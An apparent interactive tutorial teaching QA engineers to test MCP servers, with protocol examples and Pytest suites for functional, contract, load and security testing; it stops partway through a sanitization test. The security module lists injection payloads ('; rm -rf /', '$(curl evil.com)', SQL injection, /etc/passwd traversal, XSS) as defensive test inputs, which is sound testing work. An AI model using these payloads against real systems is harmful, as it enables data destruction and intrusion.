Interactive Tutorial

Testing & Validating MCP Servers

Welcome to the Workshop

This comprehensive tutorial is designed for QA Engineers and SDETswho want to master testing the Model Context Protocol (MCP). Whether you're transitioning from REST API testing or expanding your skillset into AI infrastructure, this workshop provides hands-on, production-grade knowledge.

What You'll Learn

Deep understanding of MCP architecture and protocol mechanics
Comprehensive test strategies specific to MCP servers
Hands-on implementation of functional, contract, and performance tests
Security testing techniques for AI tool orchestration
Real-world project: Build and test your own MCP server
Advanced observability and CI/CD integration patterns

Prerequisites

2-8 years of QA/SDET experience
Strong understanding of REST APIs and JSON
Familiarity with automation frameworks (Pytest, Playwright, or REST Assured)
Basic knowledge of CI/CD pipelines
Understanding of test design principles

⏱ Duration

This workshop takes approximately 3-4 hours to complete. Each module builds on the previous one, so we recommend following the sequence.

Workshop Structure

Module	Topic	Duration
Module 1	Foundations of MCP	45 min
Module 2	QA & SDET Test Strategy	60 min
Module 3	Hands-On Project	75 min
Module 4	Advanced SDET Architecture	30 min
Assessment	Final Quiz	20 min

🎯 Learning Approach

This tutorial emphasizes hands-on practice. You'll find interactive exercises, real code examples, and practical scenarios throughout. Don't just read—experiment with the code and concepts !

Module 1.1

What is MCP?

Formal Definition

Model Context Protocol (MCP)is an open protocol that standardizes how applications provide context to Large Language Models (LLMs). It enables AI applications to securely connect to diverse data sources and tools through a unified interface, solving the fragmentation problem in AI tool integration.

Why MCP Exists

Before MCP, every AI application built custom integrations for each tool, database, or API:

❌ THE OLD WAY: Claude App → Custom Slack Integration Claude App → Custom GitHub Integration Claude App → Custom Database Integration ChatGPT → Different Custom Integrations (no reuse)

Problems this created:

Duplicate engineering effort across every AI platform
No standardization or interoperability
Security inconsistencies between implementations
Difficult to maintain and version
Zero code reuse between platforms

✅ WITH MCP: Any AI App → MCP Protocol → MCP Server (Slack) Any AI App → MCP Protocol → MCP Server (GitHub) Any AI App → MCP Protocol → MCP Server (Database)

The N × M Problem

MCP solves the fundamental scaling problem in AI tool integration:

Without MCP:N AI applications × M tools=N×M custom integrations
With MCP:N clients+M servers=N+M implementations

💡 Key Insight for QA

This architectural shift means you're no longer testing just API endpoints—you' re testing a bidirectional protocolwith dynamic capability negotiation, persistent sessions, and stateful interactions.

MCP vs REST/GraphQL

Aspect	REST/GraphQL	MCP
Purpose	General API communication	LLM-context delivery
Discovery	Static OpenAPI/Schema	Dynamic capability negotiation
Session Model	Stateless (REST)	Persistent bidirectional session
Tool Schema	Not standardized	JSON Schema for tools
Transport	HTTP only	stdio, HTTP+SSE, WebSocket
Context Flow	Request → Response	Resources+Tools+Prompts

Real-World Use Cases

1. Enterprise Knowledge Assistant

MCP Server connects to: ├── Confluence (documentation) ├── JIRA (project tracking) ├── Slack (team communication) └── Git (code repositories) AI can query across all systems simultaneously. QA Challenge:Validate cross-system data consistency

2. DevOps AI Agent

MCP Server exposes tools for: ├── Deploy application ├── Rollback deployment ├── Check logs └── Monitor metrics AI orchestrates the entire deployment pipeline. QA Challenge:Test rollback scenarios and error handling

3. Customer Support Bot

MCP Server provides access to: ├── CRM data (customer history) ├── Ticketing API (support tickets) └── Knowledge base (solutions) AI resolves tickets with full context. QA Challenge:Validate PII handling and security boundaries

🧪 Reflection Exercise

Question:Think about your current testing work. What's one API or system you test that could benefit from MCP standardization?

Consider:

How would dynamic capability negotiation change your test approach?
What new test scenarios would emerge?
How would stateful sessions impact your test data management?

Module 1.2

MCP Architecture Deep Dive

High-Level Architecture

┌─────────────────────────────────────────────────────────────┐
│                                                             │
│    ┌─────────────┐           ┌─────────────┐                │
│    │             │           │             │                │
│    │  AI Client  │ ◄───────► │ MCP Server  │                │
│    │   (Claude)  │    MCP    │             │                │
│    │             │  Protocol │             │                │
│    └─────────────┘           └──────┬──────┘                │
│                                     │                       │
│           ┌─────────────────────────┼─────────────────┐     │
│           │                         │                 │     │
│       ┌───▼───┐                 ┌───▼───┐         ┌───▼───┐ │
│       │ Tools │                 │Resources│       │Prompts│ │
│       │       │                 │       │         │       │ │
│       │• calc │                 │• files│         │• expl │ │
│       │• API  │                 │• DB   │         │• fix  │ │
│       └───────┘                 └───────┘         └───────┘ │
│                                                             │
└─────────────────────────────────────────────────────────────┘

Protocol Components

1. Client (AI Application)

Initiates connection to MCP server
Discovers available capabilities
Invokes tools and fetches resources
Manages session lifecycle

2. MCP Server

Exposes tools, resources, and prompts
Handles capability negotiation
Executes tool requests
Manages state and context

3. Transport Layer

MCP supports three transport mechanisms:

Transport	Use Case	Testing Focus
stdio	Local processes	Process lifecycle, I/O streams
HTTP+SSE	Remote servers	Connection handling, retries
WebSocket	Real-time bidirectional	Connection stability, reconnection

Request Lifecycle Walkthrough

Step 1: Connection Initialization Client → Server: Initialize request Server → Client: Server capabilities Step 2: Capability Discovery Client → Server: List available tools Server → Client: Tool schemas Step 3: Tool Invocation Client → Server: Call tool with parameters Server: Execute tool logic Server → Client: Return result Step 4: Error Handling (if needed) Server → Client: Error response with details

Example: Initialize Request

 {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "initialize",
            "params": {

                "protocolVersion": "2024-11-05",
                "capabilities": {
                    "roots": {
                        "listChanged": true
                    }

                    ,
                    "sampling": {}
                }

                ,
                "clientInfo": {
                    "name": "TestClient",
                        "version": "1.0.0"
                }
            }
        }

Example: Server Response

 {

            "jsonrpc": "2.0",
            "id": 1,
            "result": {

                "protocolVersion": "2024-11-05",
                "capabilities": {
                    "logging": {}

                    ,
                    "prompts": {
                        "listChanged": true
                    }

                    ,
                    "resources": {
                        "subscribe": true,
                            "listChanged": true
                    }

                    ,
                    "tools": {
                        "listChanged": true
                    }
                }

                ,
                "serverInfo": {
                    "name": "ExampleServer",
                        "version": "1.0.0"
                }
            }
        }

🔍 Testing Insight

The initialization handshake is critical. Your tests must validate:

Protocol version compatibility
Capability negotiation correctness
Proper error handling for mismatched versions
Timeout behavior for unresponsive servers

Data Flow Architecture

Request Flow: ════════════ Client MCP Server Backend │ │ │ │ 1. List Tools │ │ ├──────────────────────────►│ │ │ │ │ │ 2. Tool Schemas │ │ │◄──────────────────────────┤ │ │ │ │ │ 3. Call Tool(params) │ │ ├──────────────────────────►│ │ │ │ 4. Execute Logic │ │ ├─────────────────────►│ │ │ │ │ │ 5. Return Data │ │ │◄─────────────────────┤ │ 6. Tool Result │ │ │◄──────────────────────────┤ │ │ │ │

🧪 Architecture Challenge

Scenario:An MCP server connects to three different databases: PostgreSQL, MongoDB, and Redis.

Questions:

How would you test connection failure to one database while others succeed?
What happens if the MCP server crashes mid-request? How should your tests detect this?
If the client disconnects, should the MCP server clean up database connections immediately or wait?

Think About:Connection pooling, resource cleanup, graceful degradation

Module 1.3

Key MCP Concepts

Core Primitives

MCP defines three primary primitives that servers can expose:

1. Tools

Definition:Executable functions that the AI can call to perform actions or retrieve computed data.

 {

            "name": "calculate_discount",
            "description": "Calculate discounted price based on original price and discount percentage",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "original_price": {
                        "type": "number",
                            "description": "Original price before discount"
                    }

                    ,
                    "discount_percent": {
                        "type": "number",
                            "description": "Discount percentage (0-100)",
                            "minimum": 0,
                            "maximum": 100
                    }
                }

                ,
                "required": ["original_price",
                "discount_percent"]
            }
        }

Testing Focus:

Schema validation (are all required fields defined?)
Input boundary testing (min/max values)
Type validation (what if a string is passed for a number?)
Required field enforcement

2. Resources

Definition:Data sources that provide context to the AI, such as files, database queries, or API responses.

 {
            "uri": "file:///docs/api-reference.md",
                "name": "API Reference Documentation",
                "description": "Complete API documentation for the product",
                "mimeType": "text/markdown"
        }

Testing Focus:

URI format validation
Resource availability (404 handling)
MIME type correctness
Large resource handling (timeouts, streaming)

3. Prompts

Definition:Reusable prompt templates that guide AI interactions.

 {

            "name": "code_review",
            "description": "Review code for bugs and improvements",
            "arguments": [ {
                "name": "code",
                    "description": "Code to review",
                    "required": true
            }

            ,
            {
            "name": "language",
                "description": "Programming language",
                "required": true
        }

        ]
        }

Tool Execution Example

Request: Calling a Tool

 {

            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 20
                }
            }
        }

Response: Successful Execution

 {

            "jsonrpc": "2.0",
            "id": 2,
            "result": {
                "content": [ {
                    "type": "text",
                        "text": "Discounted price: $80.00 (20% off $100.00)"
                }

                ]
            }
        }

Response: Error Case

 {

            "jsonrpc": "2.0",
            "id": 2,
            "error": {

                "code": -32602,
                "message": "Invalid params",
                "data": {
                    "details": "discount_percent must be between 0 and 100, got 150"
                }
            }
        }

Error Handling Strategy

Error Code	Meaning	Test Scenario
-32700	Parse error	Send malformed JSON
-32600	Invalid request	Missing required fields
-32601	Method not found	Call non-existent tool
-32602	Invalid params	Wrong parameter types
-32603	Internal error	Server crash simulation

⚠️ Critical Testing Point

Error codes must be consistent and predictable. Your test suite should verify that the server returns the correct error code for each failure scenario. Don't just check that an error occurred—validate the specific error code and message.

Edge Cases to Test

1. Boundary Values- Maximum string length - Minimum/maximum numbers - Empty arrays - Null values 2. Type Coercion- String "100" vs number 100 - Boolean true vs string "true"

        - undefined vs null 3. Unicode and Special Characters- Emoji in tool names - Non-ASCII characters - Control characters 4. Concurrent Requests- Multiple tool calls simultaneously - Race conditions in stateful operations - Resource locking 5. Timeout Scenarios- Long-running tool execution - Network delays - Database query timeouts

🧪 Practice: Schema Validation

Consider this tool schema:

 {

            "name": "send_email",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "to": {
                        "type": "string", "format": "email"
                    }

                    ,
                    "subject": {
                        "type": "string", "maxLength": 100
                    }

                    ,
                    "body": {
                        "type": "string"
                    }

                    ,
                    "attachments": {

                        "type": "array",
                        "items": {
                            "type": "string"
                        }

                        ,
                        "maxItems": 5
                    }
                }

                ,
                "required": ["to",
                "subject",
                "body"]
            }
        }

Design 5 test cases:

One positive test case
Four negative test cases targeting different validation rules

Hint:Think about email format, length limits, required fields, and array constraints.

Module 2.1

What Must Be Tested?

Comprehensive Testing Checklist

Testing an MCP server requires a multi-layered approach. Unlike REST APIs where you primarily test endpoints, MCP testing involves protocol compliance, capability negotiation, and stateful interactions.

1. Tool Registration Validation

What to verify:

All tools are properly registered during initialization
Tool schemas match JSON Schema specification
Tool names are unique and follow naming conventions
Descriptions are clear and accurate

Test Case: Duplicate Tool Names Given: MCP server with two tools named "calculate"

        When: Server initializes Then: Should reject with error OR rename with suffix Expected: Clear error message indicating duplicate tool name

2. Schema Validation

Critical validations:

Validation Type	Test Approach	Example
Type Checking	Pass wrong types	String instead of number
Required Fields	Omit required params	Missing "email" field
Format Validation	Invalid formats	"not-an-email" for email field
Range Validation	Boundary testing	101 for 0-100 range
Pattern Matching	Regex violations	"ABC" for "[0-9]+" pattern

3. Capability Exposure

During initialization, servers declare their capabilities. Test that:

 {
            "capabilities": {
                "logging": {}

                ,
                // Can send logs to client
                "prompts": {
                    // Can provide prompts
                    "listChanged": true // Notifies on prompt list changes
                }

                ,
                "resources": {
                    // Can provide resources
                    "subscribe": true, // Supports resource subscriptions
                        "listChanged": true // Notifies on resource list changes
                }

                ,
                "tools": {
                    // Can provide tools
                    "listChanged": true // Notifies on tool list changes
                }
            }
        }

Test scenarios:

Server claims "tools" capability → Must respond to tools/list
Server claims "listChanged: true" → Must emit notifications
Server lacks "resources" capability → Must reject resources/list

4. Tool Execution Logic

The core functional testing area:

For each tool,
        test: ✓ Happy Path- Valid inputs - Expected outputs - Correct data types in response ✓ Edge Cases- Boundary values (min/max) - Empty inputs - Null/undefined values - Special characters ✓ Error Conditions- Invalid inputs - Missing required fields - Type mismatches - Business logic violations ✓ State Management- Does tool modify state? - Can it be called repeatedly? - Are state changes idempotent?

5. Error Handling Behavior

🎯 Testing Principle

Good error handling is predictable, informative, and consistent. Every error should return:

Correct error code
Clear error message
Actionable details (what went wrong, how to fix)
No sensitive information leakage

6. Timeout Behavior

Test how the server handles long-running operations:

Scenario 1: Tool execution exceeds timeout Given: Tool takes 60s to execute When: Client timeout is 30s Then: Client receives timeout error And: Server should cancel/cleanup the operation Scenario 2: Network timeout Given: Client-server connection is unstable When: Request is sent Then: Implement retry logic OR fail gracefully Scenario 3: Database query timeout Given: Tool queries slow database When: Query exceeds timeout Then: Return specific timeout error And: Don't crash the server

7. Concurrency Handling

MCP servers must handle multiple simultaneous requests:

Test Type	Scenario	Expected Behavior
Parallel Tools	Call 10 different tools simultaneously	All succeed independently
Same Tool	Call same tool 10 times concurrently	All execute correctly, no race conditions
Resource Lock	Two tools accessing same database	Proper locking, no deadlocks
State Modification	Concurrent writes to shared state	Consistent final state

8. State Management

Questions to answer through testing:

Is the server stateful or stateless?
How is session state maintained?
What happens if the client reconnects?
Are there memory leaks with long-running sessions?
How is state cleaned up after client disconnection?

9. Backward Compatibility

As servers evolve, test that changes don't break existing clients:

Version 1.0: {

            "name": "get_user",
            "params": {
                "user_id": "string"
            }
        }

        Version 2.0: {

            "name": "get_user",
            "params": {
                "user_id": "string",
                    "include_metadata": "boolean" // NEW optional field
            }
        }

        Test:V1 client calling V2 server should still work

🧪 Design a Test Suite

Scenario:You're testing an MCP server that exposes a "weather_forecast" tool.

 {

            "name": "weather_forecast",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "location": {
                        "type": "string"
                    }

                    ,
                    "days": {
                        "type": "integer", "minimum": 1, "maximum": 7
                    }

                    ,
                    "units": {
                        "type": "string", "enum": ["celsius", "fahrenheit"]
                    }
                }

                ,
                "required": ["location",
                "days"]
            }
        }

Your Task:List 10 specific test cases covering:

3 positive tests
5 negative tests
2 edge case tests

Module 2.2

Functional Testing Strategy

Test Case Design Framework

Functional testing for MCP servers follows a structured approach that goes beyond simple API testing. You're validating protocol compliance, tool behavior, and integration logic.

Test Case Template

Field	Description	Example
Test ID	Unique identifier	MCP-TC-001
Category	Type of test	Tool Execution
Priority	Critical/High/Medium/Low	Critical
Preconditions	Setup requirements	Server initialized
Test Steps	Detailed actions	1. Call tool 2. Verify response
Test Data	Input parameters	{ "price": 100, "discount": 20 }
Expected Result	What should happen	Returns discounted price $80
Actual Result	What actually happened	Pass/Fail with details

Comprehensive Test Scenarios

Example: Testing "calculate_discount" Tool

Test ID	Scenario	Input	Expected Output	Type
TC-001	Valid calculation	price: 100, discount: 20	80.00	Positive
TC-002	Zero discount	price: 100, discount: 0	100.00	Boundary
TC-003	100% discount	price: 100, discount: 100	0.00	Boundary
TC-004	Negative price	price: -50, discount: 20	Error: Invalid price	Negative
TC-005	Discount>100	price: 100, discount: 150	Error: Invalid discount	Negative
TC-006	Missing field	price: 100	Error: Missing discount	Negative
TC-007	Wrong type	price: "hundred", discount: 20	Error: Invalid type	Negative
TC-008	Decimal precision	price: 99.99, discount: 33.33	66.66	Edge Case
TC-009	Very large number	price: 999999999, discount: 50	499999999.50	Edge Case
TC-010	Extra fields	price: 100, discount: 20, extra: "test"	80.00 (ignore extra)	Edge Case

Validation Checklist

For Every Tool Test:□ Response Structure ✓ Correct JSON-RPC format ✓ Proper ID matching request ✓ Result or error field (not both) □ Data Validation ✓ Correct data types ✓ Required fields present ✓ Enum values valid ✓ Format specifications met □ Error Handling ✓ Appropriate error code ✓ Clear error message ✓ Error details provided ✓ No stack traces to client □ Performance ✓ Response time < threshold ✓ No memory leaks ✓ Proper resource cleanup □ Side Effects ✓ State changes as expected ✓ Idempotency maintained ✓ No unintended modifications

Positive vs Negative Testing

Positive Tests (Expected Success)

# Example: Pytest test case def test_calculate_discount_valid_input(): "" "Test discount calculation with valid inputs" ""

        request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 20
                }
            }
        }

        response=client.send(request) assert response["jsonrpc"]=="2.0"
        assert response["id"]==1 assert "result" in response assert response["result"]["content"][0]["text"]=="Discounted price: $80.00"

Negative Tests (Expected Failure)

def test_calculate_discount_invalid_discount(): "" "Test that discount > 100 returns error" ""

        request= {

            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 150 # Invalid !
                }
            }
        }

        response=client.send(request) assert "error" in response assert response["error"]["code"]==-32602 # Invalid params assert "must be between 0 and 100" in response["error"]["message"]

Schema Validation Examples

import jsonschema def test_tool_schema_compliance(): "" "Verify tool schema is valid JSON Schema" ""

        tool_schema= {

            "name": "send_notification",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "message": {
                        "type": "string", "maxLength": 500
                    }

                    ,
                    "priority": {
                        "type": "string", "enum": ["low", "medium", "high"]
                    }

                    ,
                    "recipients": {

                        "type": "array",
                        "items": {
                            "type": "string", "format": "email"
                        }

                        ,
                        "minItems": 1,
                        "maxItems": 10
                    }
                }

                ,
                "required": ["message",
                "recipients"]
            }
        }

        # Validate the schema itself is valid JSON Schema try: jsonschema.Draft7Validator.check_schema(tool_schema["inputSchema"]) except jsonschema.SchemaError as e: pytest.fail(f"Invalid schema: {e}") # Test valid input valid_input= {
            "message": "Test notification",
                "priority": "high",
                "recipients": ["[email protected]"]
        }

        jsonschema.validate(valid_input, tool_schema["inputSchema"]) # Test invalid input invalid_input= {
            "message": "x" * 501, # Exceeds maxLength "recipients": [] # Violates minItems
        }

        with pytest.raises(jsonschema.ValidationError): jsonschema.validate(invalid_input, tool_schema["inputSchema"])

🧪 Build Your Test Matrix

Tool Specification:

 {

            "name": "create_user",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "username": {
                        "type": "string",
                        "pattern": "^[a-z0-9_]{3,20}$"
                    }

                    ,
                    "email": {
                        "type": "string",
                            "format": "email"
                    }

                    ,
                    "age": {
                        "type": "integer",
                            "minimum": 18,
                            "maximum": 120
                    }

                    ,
                    "role": {
                        "type": "string",
                            "enum": ["user", "admin", "moderator"]
                    }
                }

                ,
                "required": ["username",
                "email"]
            }
        }

Task:Create a complete test matrix with:

At least 5 positive test cases
At least 8 negative test cases
3 boundary value tests

Think about:Pattern matching, email validation, integer boundaries, enum values, required fields

Module 2.3

Contract Testing

What is Contract Testing?

Contract testing verifies that the MCP server adheres to its published interface contract. Unlike functional testing (which tests behavior), contract testing ensures the API structure, data types, and protocol compliance remain consistent across versions.

🎯 Key Principle

Contract tests answer: "Does the server do what it promised in its schema?"

Why Contract Testing Matters for MCP

Version Compatibility:Clients depend on stable contracts
Breaking Change Detection:Catch incompatible changes early
Documentation Validation:Ensure docs match reality
Consumer-Driven:Protect clients from server changes

JSON Schema Validation

Tool Schema Contract

import jsonschema import pytest def test_tool_list_contract(): "" "Verify tools/list response matches expected contract" ""

        # Expected contract for tools/list response expected_schema= {

            "type": "object",
            "properties": {
                "jsonrpc": {
                    "const": "2.0"
                }

                ,
                "id": {
                    "type": ["number", "string"]
                }

                ,
                "result": {

                    "type": "object",
                    "properties": {
                        "tools": {

                            "type": "array",
                            "items": {

                                "type": "object",
                                "properties": {
                                    "name": {
                                        "type": "string"
                                    }

                                    ,
                                    "description": {
                                        "type": "string"
                                    }

                                    ,
                                    "inputSchema": {
                                        "type": "object"
                                    }
                                }

                                ,
                                "required": ["name",
                                "inputSchema"]
                            }
                        }
                    }

                    ,
                    "required": ["tools"]
                }
            }

            ,
            "required": ["jsonrpc",
            "id",
            "result"]
        }

        # Make actual request response=client.list_tools() # Validate against contract try: jsonschema.validate(response, expected_schema) except jsonschema.ValidationError as e: pytest.fail(f"Contract violation: {e.message}")

Snapshot Testing

Snapshot testing captures the current API response and compares future responses against it. This catches unintended changes.

import json import pytest def test_calculate_discount_response_snapshot(snapshot): "" "Ensure response structure hasn't changed" ""

        request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100, "discount_percent": 20
                }
            }
        }

        response=client.send(request) # Remove dynamic fields for comparison response_snapshot= {

            "jsonrpc": response["jsonrpc"],
            "id": response["id"],
            "result": {
                "content": response["result"]["content"]
            }
        }

        # Compare with stored snapshot snapshot.assert_match(json.dumps(response_snapshot, indent=2), "discount_response.json")

Protocol Versioning Impact

Change Type	Breaking?	Contract Test Strategy
Add new tool	❌ No	Verify tool list grows
Remove existing tool	✅ Yes	Block in CI/CD
Add optional parameter	❌ No	Verify backward compatibility
Add required parameter	✅ Yes	Block in CI/CD
Change parameter type	✅ Yes	Block in CI/CD
Change error code	✅ Yes	Version bump required

Consumer-Driven Contract Testing

In consumer-driven testing, clients define their expectations (contracts), and the server must satisfy them.

# consumer_contract.yaml interactions: - description: Calculate discount for valid input request: method: tools/call params: name: calculate_discount arguments: original_price: 100 discount_percent: 20 response: status: success body: matchingRules: "$.result.content[0].type": {
            match: "type", value: "string"
        }

        "$.result.content[0].text": {
            match: "regex",
            regex: "Discounted price: \\$\\d+\\.\\d{2}"
        }

🧪 Practice: Define a Contract

Scenario:You're testing a "currency_converter" tool.

 {

            "name": "currency_converter",
            "inputSchema": {

                "type": "object",
                "properties": {
                    "amount": {
                        "type": "number", "minimum": 0
                    }

                    ,
                    "from_currency": {
                        "type": "string",
                        "pattern": "^[A-Z]{3}$"
                    }

                    ,
                    "to_currency": {
                        "type": "string",
                        "pattern": "^[A-Z]{3}$"
                    }
                }

                ,
                "required": ["amount",
                "from_currency",
                "to_currency"]
            }
        }

Task:Write a JSON Schema that validates the response structure for this tool. Consider:

What fields should be in the result?
What data types should they have?
What fields are required vs optional?

Module 2.4

Performance & Load Testing

Performance Testing for MCP Servers

Performance testing validates that your MCP server can handle expected load while maintaining acceptable response times and resource usage.

Key Performance Metrics

Metric	Description	Target
Response Time	Time from request to response	< 100ms (p95)
Throughput	Requests per second	100+RPS
Latency (p99)	99th percentile response time	< 500ms
Error Rate	Failed requests percentage	< 0.1%
CPU Usage	Server CPU consumption	< 70%
Memory Usage	RAM consumption	No leaks

Throughput Validation

Test how many requests the server can handle per second:

import asyncio import time from concurrent.futures import ThreadPoolExecutor async def load_test_throughput(): "" "Test server throughput with concurrent requests" ""

        num_requests=1000 concurrent_workers=50 start_time=time.time() async def make_request(): request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100, "discount_percent": 20
                }
            }
        }

        return await client.send_async(request) # Execute concurrent requests tasks=[make_request() for _ in range(num_requests)] results=await asyncio.gather(*tasks, return_exceptions=True) end_time=time.time() duration=end_time - start_time # Calculate metrics successful=sum(1 for r in results if not isinstance(r, Exception)) failed=num_requests - successful throughput=num_requests / duration print(f"Total requests: {num_requests}") print(f"Successful: {successful}") print(f"Failed: {failed}") print(f"Duration: {duration:.2f}s") print(f"Throughput: {throughput:.2f} req/s") assert throughput>=100,
        f"Throughput {throughput} below target"
        assert failed / num_requests < 0.001,
        f"Error rate too high"

Latency Benchmarking

import numpy as np def test_latency_percentiles(): "" "Measure response time distribution" ""

        num_samples=100 response_times=[] for i in range(num_samples): start=time.time() response=client.send({

            "jsonrpc": "2.0",
            "id": i,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100, "discount_percent": 20
                }
            }
        }) end=time.time() response_times.append((end - start) * 1000) # Convert to ms # Calculate percentiles p50=np.percentile(response_times, 50) p95=np.percentile(response_times, 95) p99=np.percentile(response_times, 99) print(f"Response Time Distribution:") print(f"  p50 (median): {p50:.2f}ms") print(f"  p95: {p95:.2f}ms") print(f"  p99: {p99:.2f}ms") # Assertions assert p95 < 100,
        f"p95 latency {p95}ms exceeds 100ms target"
        assert p99 < 500,
        f"p99 latency {p99}ms exceeds 500ms target"

Concurrent Tool Invocation Tests

def test_concurrent_same_tool(): "" "Test calling the same tool concurrently" ""

        num_concurrent=20 with ThreadPoolExecutor(max_workers=num_concurrent) as executor: futures=[] for i in range(num_concurrent): future=executor.submit(client.send,
            {

            "jsonrpc": "2.0",
            "id": i,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100 + i,
                    "discount_percent": 20
                }
            }
        }) futures.append(future) # Wait for all to complete results=[f.result(timeout=10) for f in futures] # Verify all succeeded for result in results: assert "result" in result,
        "Request failed"
        assert "error" not in result def test_concurrent_different_tools(): "" "Test calling different tools concurrently" ""

        tools=["calculate_discount",
        "currency_converter",
        "weather_forecast"] with ThreadPoolExecutor(max_workers=len(tools)) as executor: futures= {
            executor.submit(call_tool, tool): tool for tool in tools
        }

        for future in futures: tool_name=futures[future] try: result=future.result(timeout=5) assert "result" in result except Exception as e: pytest.fail(f"Tool {tool_name} failed: {e}")

Resource Exhaustion Tests

Test 1: Memory Leak Detection- Monitor memory usage over 1000+requests - Memory should remain stable - No continuous growth pattern Test 2: Connection Pool Exhaustion- Open 100+concurrent connections - Verify server handles gracefully - Check for connection timeout errors Test 3: Large Payload Handling- Send tool calls with 1MB+parameters - Verify server doesn't crash
 - Check memory cleanup after processing Test 4: Rapid Connect/Disconnect- Connect and disconnect 50 times rapidly - Check for resource leaks - Verify cleanup happens correctly

🧪 Design a Load Test

Scenario:Your MCP server will be used by 100 concurrent AI agents, each making 10 tool calls per minute.

Calculate:

What's the expected requests per second?
What's a reasonable p95 latency target?
How would you simulate this load?

Design:Write pseudocode for a load test that validates this scenario.

Module 2.5

Security Testing

Security Testing for MCP Servers

Security testing is critical for MCP servers because they often have access to sensitive data, APIs, and can execute arbitrary operations. As a QA engineer, you must validate security boundaries.

⚠️ Security First

MCP servers are privileged components in AI systems. A compromised server can leak data, corrupt systems, or enable unauthorized actions. Security testing is not optional.

Threat Model for MCP Servers

Threat	Attack Vector	Test Strategy
Prompt Injection	Malicious input in tool parameters	Inject commands in strings
Schema Poisoning	Manipulated tool schemas	Send malformed schemas
Data Exfiltration	Unauthorized data access	Test access controls
Privilege Escalation	Bypass authorization checks	Attempt restricted operations
DoS/Resource Exhaustion	Overwhelming requests	Send massive payloads

1. Prompt Injection Testing

Test if malicious input can manipulate server behavior:

def test_prompt_injection_attempts(): "" "Test various prompt injection techniques" ""

        injection_payloads=[ # Command injection "; rm -rf /",
        "$(curl evil.com)",

        # SQL injection patterns "'; DROP TABLE users; --",
        "1' OR '1'='1",

        # Path traversal "../../../etc/passwd",
        "....//....//....//etc/passwd",

        # Script injection "<script>alert('XSS')</script>",
        "javascript:alert(1)",

        # Template injection "{{7*7}}",
        "${7*7}",

        # LDAP injection "*)(uid=*))(|(uid=*",
        ] for payload in injection_payloads: request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "search_files",
                "arguments": {
                    "query": payload
                }
            }
        }

        response=client.send(request) # Server should handle safely - either sanitize or reject if "result" in response: # Check result doesn't contain executed payload
 result_text=str(response["result"]) assert "etc/passwd" not in result_text assert "DROP TABLE" not in result_text elif "error" in response: # Error is acceptable - server rejected dangerous input pass else: pytest.fail("Unexpected response format")

2. Malformed Tool Payloads

def test_malformed_payloads(): "" "Test server's resilience to malformed requests" ""

        malformed_requests=[ # Missing required fields {
            "jsonrpc": "2.0", "method": "tools/call"
        }

        ,

        # Wrong JSON-RPC version {

            "jsonrpc": "1.0",
            "id": 1,
            "method": "tools/call",
            "params": {}
        }

        ,

        # Invalid method name {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "/../../../etc/passwd",
            "params": {}
        }

        ,

        # Oversized payload {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "test",
                "arguments": {
                    "data": "X" * 10_000_000
                }
            }
        }

        ,

        # Deeply nested structure {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "a": {
                    "b": {
                        "c": {
                            "d": {
                                "e": "..."
                            }
                        }
                    }
                }
            }
        }

        * 1000,

        # NULL bytes {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools\x00/call",
            "params": {}
        }

        ,
        ] for malformed in malformed_requests: try: response=client.send(malformed) # Should return proper error,
        not crash assert "error" in response assert response["error"]["code"] in [-32700,
        -32600,
        -32602] except Exception as e: # Connection errors are acceptable (server protecting itself) print(f"Server rejected malformed request: {e}")

3. Input Fuzzing

import random import string def test_input_fuzzing(): "" "Fuzz test tool inputs" ""

        def generate_fuzz_string(length): "" "Generate random fuzz input" ""
        chars=string.printable+"" .join(chr(i) for i in range(128, 256)) return "" .join(random.choice(chars) for _ in range(length)) fuzz_cases=[ # Random strings generate_fuzz_string(100),
        generate_fuzz_string(1000),

        # Unicode edge cases "\u0000" * 100,
        # NULL bytes "\uffff" * 100,
        # Max unicode "🔥" * 100,
        # Emoji # Format strings "%s" * 100,
        "%n" * 100,

        # Boundary integers 2**31 - 1,
        # Max int32 2**63 - 1,
        # Max int64 -2**63,
        # Min int64] for fuzz_input in fuzz_cases: request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "process_text",
                "arguments": {
                    "text": fuzz_input
                }
            }
        }

        try: response=client.send(request) # Server should handle gracefully - not crash assert "result" in response or "error" in response except Exception as e: # Network errors are acceptable if server self-protects print(f"Fuzz input caused: {e}")

4. Authorization Testing

Test Case: Unauthorized Tool AccessGiven: User has permission for "read_data" tool only When: User attempts to call "delete_data" tool Then: Server returns 403 Forbidden error Test Case: Token ValidationGiven: Valid authentication token required When: Request sent without token Then: Server rejects with authentication error Test Case: Expired TokenGiven: Token expired 1 hour ago When: Request sent with expired token Then: Server rejects and requests re-authentication Test Case: Token TamperingGiven: Valid token signature When: Token payload is modified Then: Server detects tampering and rejects

5. Data Validation Security

def test_data_sanitization(): "" "Test that server sanitizes dangerous data" ""

        test_cases=[ {
            "name": "HTML Injection",
                "input": "<img src=x onerror=alert('XSS')>",
